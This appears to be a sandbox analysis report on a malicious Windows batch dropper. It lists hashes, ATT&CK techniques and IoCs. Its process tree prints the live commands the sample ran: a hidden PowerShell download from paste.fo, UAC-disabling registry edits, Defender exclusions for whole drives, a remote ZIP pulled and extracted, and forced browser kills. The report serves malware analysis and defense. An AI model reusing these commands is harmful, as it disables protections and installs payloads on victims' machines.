f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
30-12-2024 10:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEW-DRAWING-SHEET.bat
Size

41KB
MD5

6b9cf24f2b691606642bd18bf2227a62
SHA1

046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
SHA256

f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
SHA512

db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e
SSDEEP

768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO

Score

10^/10

defense_evasion discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://paste.fo/raw/a1af5a4d0301

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2660	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2660	powershell.exe
800	powershell.exe
2952	powershell.exe
1528	powershell.exe
1928	powershell.exe
2332	powershell.exe
2272	powershell.exe
2476	powershell.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

Possible Turn off User Account Control's privilege elevation for standard users.

defense_evasion persistence privilege_escalation

Executable Installer File Permissions Weakness

T1574.005

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com
15	raw.githubusercontent.com
7	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2744	timeout.exe
3012	timeout.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
2500	taskkill.exe
380	taskkill.exe
2212	taskkill.exe
1604	taskkill.exe
1500	taskkill.exe
2784	taskkill.exe
2388	taskkill.exe
1628	taskkill.exe
552	taskkill.exe
2108	taskkill.exe
1600	taskkill.exe
2312	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 26 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C5B69A71-C698-11EF-B387-F234DE72CD42} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe

Modifies registry key 1 TTPs 12 IoCs

Modify Registry

T1112

pid	Process
2852	reg.exe
2264	reg.exe
2736	reg.exe
868	reg.exe
3016	reg.exe
2536	reg.exe
1012	reg.exe
2252	reg.exe
1144	reg.exe
2704	reg.exe
1476	reg.exe
3012	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2660	powershell.exe
2476	powershell.exe
2476	powershell.exe
2476	powershell.exe
2952	powershell.exe
1528	powershell.exe
1928	powershell.exe
2332	powershell.exe
2272	powershell.exe
800	powershell.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeRestorePrivilege	2852	7z.exe
Token: 35	2852	7z.exe
Token: SeSecurityPrivilege	2852	7z.exe
Token: SeDebugPrivilege	2500	taskkill.exe
Token: SeDebugPrivilege	2388	taskkill.exe
Token: SeDebugPrivilege	1628	taskkill.exe
Token: SeDebugPrivilege	552	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	380	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	2312	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2748	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2748	iexplore.exe
2748	iexplore.exe
1924	IEXPLORE.EXE
1924	IEXPLORE.EXE
1924	IEXPLORE.EXE
1924	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2124	2084	cmd.exe	31
PID 2084 wrote to memory of 2124	2084	cmd.exe	31
PID 2084 wrote to memory of 2124	2084	cmd.exe	31
PID 2124 wrote to memory of 2660	2124	cmd.exe	33
PID 2124 wrote to memory of 2660	2124	cmd.exe	33
PID 2124 wrote to memory of 2660	2124	cmd.exe	33
PID 2124 wrote to memory of 2476	2124	cmd.exe	34
PID 2124 wrote to memory of 2476	2124	cmd.exe	34
PID 2124 wrote to memory of 2476	2124	cmd.exe	34
PID 2476 wrote to memory of 2184	2476	powershell.exe	35
PID 2476 wrote to memory of 2184	2476	powershell.exe	35
PID 2476 wrote to memory of 2184	2476	powershell.exe	35
PID 2184 wrote to memory of 2252	2184	cmd.exe	37
PID 2184 wrote to memory of 2252	2184	cmd.exe	37
PID 2184 wrote to memory of 2252	2184	cmd.exe	37
PID 2184 wrote to memory of 3012	2184	cmd.exe	38
PID 2184 wrote to memory of 3012	2184	cmd.exe	38
PID 2184 wrote to memory of 3012	2184	cmd.exe	38
PID 2184 wrote to memory of 2264	2184	cmd.exe	39
PID 2184 wrote to memory of 2264	2184	cmd.exe	39
PID 2184 wrote to memory of 2264	2184	cmd.exe	39
PID 2184 wrote to memory of 2852	2184	cmd.exe	40
PID 2184 wrote to memory of 2852	2184	cmd.exe	40
PID 2184 wrote to memory of 2852	2184	cmd.exe	40
PID 2124 wrote to memory of 2748	2124	cmd.exe	41
PID 2124 wrote to memory of 2748	2124	cmd.exe	41
PID 2124 wrote to memory of 2748	2124	cmd.exe	41
PID 2184 wrote to memory of 2704	2184	cmd.exe	42
PID 2184 wrote to memory of 2704	2184	cmd.exe	42
PID 2184 wrote to memory of 2704	2184	cmd.exe	42
PID 2184 wrote to memory of 2736	2184	cmd.exe	43
PID 2184 wrote to memory of 2736	2184	cmd.exe	43
PID 2184 wrote to memory of 2736	2184	cmd.exe	43
PID 2124 wrote to memory of 2744	2124	cmd.exe	44
PID 2124 wrote to memory of 2744	2124	cmd.exe	44
PID 2124 wrote to memory of 2744	2124	cmd.exe	44
PID 2184 wrote to memory of 868	2184	cmd.exe	45
PID 2184 wrote to memory of 868	2184	cmd.exe	45
PID 2184 wrote to memory of 868	2184	cmd.exe	45
PID 2184 wrote to memory of 3016	2184	cmd.exe	46
PID 2184 wrote to memory of 3016	2184	cmd.exe	46
PID 2184 wrote to memory of 3016	2184	cmd.exe	46
PID 2184 wrote to memory of 2536	2184	cmd.exe	47
PID 2184 wrote to memory of 2536	2184	cmd.exe	47
PID 2184 wrote to memory of 2536	2184	cmd.exe	47
PID 2748 wrote to memory of 1924	2748	iexplore.exe	48
PID 2748 wrote to memory of 1924	2748	iexplore.exe	48
PID 2748 wrote to memory of 1924	2748	iexplore.exe	48
PID 2748 wrote to memory of 1924	2748	iexplore.exe	48
PID 2184 wrote to memory of 1476	2184	cmd.exe	49
PID 2184 wrote to memory of 1476	2184	cmd.exe	49
PID 2184 wrote to memory of 1476	2184	cmd.exe	49
PID 2184 wrote to memory of 1012	2184	cmd.exe	50
PID 2184 wrote to memory of 1012	2184	cmd.exe	50
PID 2184 wrote to memory of 1012	2184	cmd.exe	50
PID 2184 wrote to memory of 1144	2184	cmd.exe	51
PID 2184 wrote to memory of 1144	2184	cmd.exe	51
PID 2184 wrote to memory of 1144	2184	cmd.exe	51
PID 2184 wrote to memory of 2952	2184	cmd.exe	52
PID 2184 wrote to memory of 2952	2184	cmd.exe	52
PID 2184 wrote to memory of 2952	2184	cmd.exe	52
PID 2184 wrote to memory of 1528	2184	cmd.exe	53
PID 2184 wrote to memory of 1528	2184	cmd.exe	53
PID 2184 wrote to memory of 1528	2184	cmd.exe	53

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat'))"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2184
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2252
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
        5⤵
        Hijack Execution Flow: Executable Installer File Permissions Weakness
        Modifies registry key
        
        PID:3012
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2264
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2852
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2704
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2736
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:868
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:3016
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2536
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1476
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:1012
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:1144
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2952
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1928
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2272
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:800
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2748
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2748 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1924
- - C:\Windows\system32\timeout.exe
    timeout /t 9
    3⤵
    - Delays execution with timeout.exe
    PID:2744
- - C:\Program Files\7-Zip\7z.exe
    "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOC.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- - C:\Windows\system32\timeout.exe
    timeout /t 9
    3⤵
    - Delays execution with timeout.exe
    PID:3012
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:552
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2108
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM safari.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:380
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM brave.exe
    3⤵
    - Kills process with taskkill
    PID:2212
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM vivaldi.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1600
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM epic.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM yandex.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM tor.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM CMD.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4219d7709a206404cc6bd944466fad0c

SHA1
8525b58811dce9674c2671d169eaef9a3c8681b8

SHA256
da9613fe4a360dee363a78c35d3161008b5c9381634a046d9a47973441c3c804

SHA512
ccf94cd3098b30313caead2a4335a7db5d46f8735541df38c88dd086db5fd7df69a8c3a437d3f1d9618c87511f13f2871215780b977ec70dc435dce8dc68b919

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
45847bbfe60158d00bd9fa9854e2afd4

SHA1
f95ce1662c72c980406725b0991a7acf09c8cd7b

SHA256
3ae7f4eca63e95b016d43c1bff9a1da652d252ce6e39a2b78f9dbe628b9bd38a

SHA512
63cd30c830e630e67aa1da1c9b56995da85d72fadf8c63307b99768a47a697ae506554262e22905d0ba9a6a8d6ecf21894caf3f9699a0719060937c942d489ae

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
304e1a07d53e774c5bb4d9a615224afa

SHA1
c6eebe737bf0820ad35d28d5ef0ad6c8e80e0fab

SHA256
68b9c4b905e5629ab806a4adf3b736ca644b009a9d6eacadec5e7ea2e9a92694

SHA512
d30b1a68f19129a19efc4beb5fdbd55c5264c13003e07d40478760c78bc0398b3d813060134c1b6d73f3ff5f1dfb205eec4c380a98df6808043a2e15837dfa38

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
39883b73be7ff878da06e91fa5957785

SHA1
3e5721652ace0e3aac534d417f3b3d0da4763345

SHA256
16dc314ebab4cd6dbe124ce8df882849caf95c820661428f885ea46b301d9066

SHA512
2ef33d546eb4f8e0ad1cdbade0b7195c47d46cb5883b4039c545279be1c135b0a5dd79a2faf972cb43d7a21380c87ca1933934eb8bc1974ccde86c28d407003c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
222cb25e7ee5979280e58b5baa1e5fd8

SHA1
0286bd959d6d4f64883d0e9f8f96c03fbe003541

SHA256
2e951a0bb8b695a93eb772d4de0ffdcb0abf9aa388f1b9328f77a4bf7129937a

SHA512
d11892b39dd7c4c198ce44af069411abca34f2d9ab90f1a1c47afbb88096883bdbbd4bf0da0115dd92010742f6d0abc79e4d7042b484c49d9fed3c72a0d8dd51

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
38e75879738a3a4123aaf9a2068ab89e

SHA1
4f804b92e1c00e7892827f2d62ae0f0ac83dbfee

SHA256
e12cff161ac54946b396f1f8145ec6b6af649932625d64720bdbc9660f08273f

SHA512
b98f5cb23f0f00fe4845b943aa07be0a9580a1ad53eb3bfa71eb07ad7a79c73fe6662cbdc5ed2abbc291e881a4cc3d7f25fc5739d17a176e3fc661d7356e0b12

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4897e7049e39dda013d9f1aa07e05fb8

SHA1
1f72f22588e737e27170504a63803fb3acfbccb6

SHA256
dd53c10f8a9baac095fe977761fc0d26cfa9d3dac0d4ff8db0a5d50557250e14

SHA512
e11bd5ced26df54d400f475536aacab373fb576fe7e78f7e721d6c448cd42c86d1382de799d2faad51013aa1194842a4efe6e6c629db93a9443b8fbd4da2fc5c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ef8db7ac4c3737b9ec98d8dee510fc80

SHA1
6562295270ddf7fd594cfe8bdd7ed3f9fedb1999

SHA256
6ff2f8530717d8a8b89ca10d353cd74e25297fcf2a176e6a1a5dda6e762f9b58

SHA512
ec878e33b8f5fc078fd4cd16d484004c1af5d5b240111012a4e8a1dea2870fa36d1b83b6b58a9480c35bf1744d6a4a85bb3ac1e8c48f2773b68bc54f7335a249

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2a12e3d1638accea0c199505bcb13a1e

SHA1
444e688042561d5c48f88c597d2e1975113ef511

SHA256
b24829bacda0696b70cebf8e4757b6f12ca3fe55b80775ffe7ec5eca6bcb0f35

SHA512
da0aa72a2ba0b54ed2b63658e0ada472965d515384470892e33d3853db84abaf13507911fd8fedb53c0fb1afa0d86a87bcc3db89b181217a6bfaa3f349218b1c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0723f6679e3145c2216014af6b83468c

SHA1
f588b0934902e8d6899ed9297651a839e5802211

SHA256
eb7a4b4566b0c588dd52102fb39fc894dadfb6ff01ae269f7abfadd4a4f2731c

SHA512
0834ab4f8a0fe794bc91c6fd86c4d28f85b70a92d1a04bf59fd67a88cc289b398e80ea27ebec3ea832a7b060a0f4434c0119804ab3a551321ce8c003d420f865

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
05323451f77df9c3282f909efb86d741

SHA1
4e2c75d5a3db6319ab00ecad9a145e464f7fd240

SHA256
6475cd9182c253f3fd7f58bcf5d16ea4305f242cab8ce0236839b6f3a3c87741

SHA512
